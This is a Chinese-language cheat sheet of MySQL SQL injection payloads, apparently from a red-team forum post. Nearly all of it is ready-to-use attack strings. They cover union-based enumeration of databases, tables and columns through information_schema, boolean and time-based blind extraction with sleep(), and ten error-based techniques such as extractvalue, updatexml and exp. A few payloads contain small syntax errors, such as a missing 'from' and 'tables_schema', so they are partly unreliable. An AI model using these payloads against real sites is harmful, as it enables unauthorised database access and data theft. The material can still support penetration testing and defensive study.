基础SQL注入速查表-Mysql篇

红蓝对抗 jus4fun 537 阅读

基础SQL注入速查表Mysql篇

1.union注入

1.1 字段数

http://localhost/?id=1' order by 3

1.2 找回显

http://localhost/?id=-1' union all select 1,2,3

1.3 查数据库名

http://localhost/?id=-1' union all select 1,group_concat(schema_name),3 from  information_schema.schemata

1.4 查表名

http://localhost/?id=-1' union all select 1,2,group_concat(table_name) from information_schema.tables where table_schema=0x指定数据库名的十六进制编码

1.5 查字段名

http://localhost/?id=-1' union all select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x指定表名的十六进制编码

2.布尔盲注

2.1布尔盲注常用函数解析

1.ascii和ord
    取一个字母的ascii码值
2.left 
    left(a,b)从左侧截取 a 的前 b 位
    例:left(database(),1)>'s'
3.substr
    substr(a,b,c)从 b 位置开始,截取字符串 a 的 c 长度
    例:ascii(substr((select table_name information_schema.tables where tables_schema=database()limit 0,1),1,1))=101
4.mid
    mid(a,b,c)从位置 b 开始,截取 a 字符串的 c 位
5.regexp
    select user() regexp '^ro'返回结果为0或者1,匹配成功为1,不成功为0
6.like
    用法:select user() like ‘ro%’

2.2布尔盲注payload

1.猜数据库长度
http://localhost/?id=1' and length(database())=8
2.猜第一个数据库名的第一个字母
http://localhost/?id=1'and ascii(substr((select schema_name from information_schema.schemata limit 0,1),1,1))=80
3.猜某一数据库第一个表名的第一个字母
http://localhost/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=80
4.猜某一数据库表的第一个字段的第一个字母
http://localhost/?id=1' and ascii(substr((select column_name from information_schema.columns where table_name=0x表名十六进制 limit 0,1),1,1))=80

3.时间盲注

http://localhost/?id=1'and If(ascii(substr(database(),1,1))=115,1,sleep(5))
if(条件,res1,res2):如果条件为TRUE返回res1,如果条件为FALSE返回res2
其余语句可查询bool盲注

4.报错注入

4.1 floor()

select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);

4.2 extractvalue()

select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));

4.3 updatexml()

select * from test where id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1));

4.4 geometrycollection()

select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));

4.5 multipoint()

select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));

4.6 polygon()

select * from test where id=1 and polygon((select * from(select * from(select user())a)b));

4.7 multipolygon()

select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));

4.8 linestring()

select * from test where id=1 and linestring((select * from(select * from(select user())a)b));

4.9 multilinestring()

select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));

4.10 exp()

select * from test where id=1 and exp(~(select * from(select user())a));